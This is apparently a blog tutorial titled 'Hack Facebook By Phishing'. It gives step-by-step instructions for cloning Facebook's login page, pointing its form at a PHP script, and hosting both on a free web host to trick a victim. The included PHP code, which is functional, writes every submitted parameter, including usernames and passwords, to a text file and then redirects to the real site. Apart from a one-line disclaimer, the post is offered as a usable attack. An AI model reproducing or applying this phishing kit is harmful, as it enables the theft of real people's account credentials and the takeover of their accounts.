Hack Facebook By Phishing


What Is Phishing ???


   Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes indirectly money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication.

Phishing A Facebook Page:

   1.) Goto facebook.com. Right click anywhere and select "View Page Source".


   2.) Create a new document and copy the code. Now press Ctrl + F and search for "action".


   3.) Change it to "action=hack.php" and "method=get".


   4.) Save the document as "index.html" and save as type to "All Files".


   5.) Copy the below code and save it as "hack.php".

             <?php
             header("Location: http://www.facebook.com ");
             $handle = fopen("show.txt", "a");
             foreach($_GET as $variable => $value) {
               fwrite($handle, $variable);
               fwrite($handle, "=");
               fwrite($handle, $value);
               fwrite($handle, "\r\n");
             }
             fwrite($handle, "\r\n");
             fclose($handle);
             header("Location:http://www.facebook.com");
             exit;
             ?>


   6.) Next we need to upload these two files (index.html and hack.php) on any web hosting sites like 000webhost.com.

   7.) If you have one, you can upload them. If you don't have, then create a new one and login. Goto "File Manager".


   8.) Goto "public_html" and upload here.


   9.) Now try to manipulate and give the phishing page (your domain) to the victim.

   10.) After your victim login's there, refresh your file manager there you will see "show.txt".

   11.) Download it and open it. BINGO !!!!!



Note: This is for educational purposes only and I'm not responsible for anything.



Happy Hacking ..........



Feel free to comment below.....





Myself M S Lalith signing off  !!!!!



No comments:

Post a Comment